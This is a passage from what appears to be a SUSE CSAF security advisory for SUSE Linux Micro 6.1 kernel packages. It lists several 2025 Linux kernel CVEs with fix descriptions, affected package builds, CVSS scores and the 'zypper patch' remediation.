helper function,\n- Preserves correct behavior for discrete GPUs (which have fully initialized\n `man-\u003ebdev` and pass the `ttm_resource_manager_used()` check).\n\nv4: use ttm_resource_manager_used(\u0026adev-\u003emman.vram_mgr.manager) instead of checking the adev-\u003egmc.is_app_apu flag (Christian)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40288",
"url": "https://www.suse.com/security/cve/CVE-2025-40288"
},
{
"category": "external",
"summary": "SUSE Bug 1255057 for CVE-2025-40288",
"url": "https://bugzilla.suse.com/1255057"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40288"
},
{
"cve": "CVE-2025-40289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM\n\nOtherwise accessing them can cause a crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40289",
"url": "https://www.suse.com/security/cve/CVE-2025-40289"
},
{
"category": "external",
"summary": "SUSE Bug 1255042 for CVE-2025-40289",
"url": "https://bugzilla.suse.com/1255042"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40289"
},
{
"cve": "CVE-2025-40292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix received length check in big packets\n\nSince commit 4959aebba8c0 (\"virtio-net: use mtu size as buffer length\nfor big packets\"), when guest gso is off, the allocated size for big\npackets is not MAX_SKB_FRAGS * PAGE_SIZE anymore but depends on\nnegotiated MTU. The number of allocated frags for big packets is stored\nin vi-\u003ebig_packets_num_skbfrags.\n\nBecause the host announced buffer length can be malicious (e.g. the host\nvhost_net driver\u0027s get_rx_bufs is modified to announce incorrect\nlength), we need a check in virtio_net receive path. Currently, the\ncheck is not adapted to the new change which can lead to NULL page\npointer dereference in the below while loop when receiving length that\nis larger than the allocated one.\n\nThis commit fixes the received length check corresponding to the new\nchange.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40292",
"url": "https://www.suse.com/security/cve/CVE-2025-40292"
},
{
"category": "external",
"summary": "SUSE Bug 1255175 for CVE-2025-40292",
"url": "https://bugzilla.suse.com/1255175"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40292"
},
{
"cve": "CVE-2025-40293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Don\u0027t overflow during division for dirty tracking\n\nIf pgshift is 63 then BITS_PER_TYPE(*bitmap-\u003ebitmap) * pgsize will overflow\nto 0 and this triggers divide by 0.\n\nIn this case the index should just be 0, so reorganize things to divide\nby shift and avoid hitting any overflows.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40293",
"url": "https://www.suse.com/security/cve/CVE-2025-40293"
},
{
"category": "external",
"summary": "SUSE Bug 1255179 for CVE-2025-40293",
"url": "https://bugzilla.suse.com/1255179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40293"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-40301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_event: validate skb length for unknown CC opcode\n\nIn hci_cmd_complete_evt(), if the command complete event has an unknown\nopcode, we assume the first byte of the remaining skb-\u003edata contains the\nreturn status. However, parameter data has previously been pulled in\nhci_event_func(), which may leave the skb empty. If so, using skb-\u003edata[0]\nfor the return status uses un-init memory.\n\nThe fix is to check skb-\u003elen before using skb-\u003edata.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
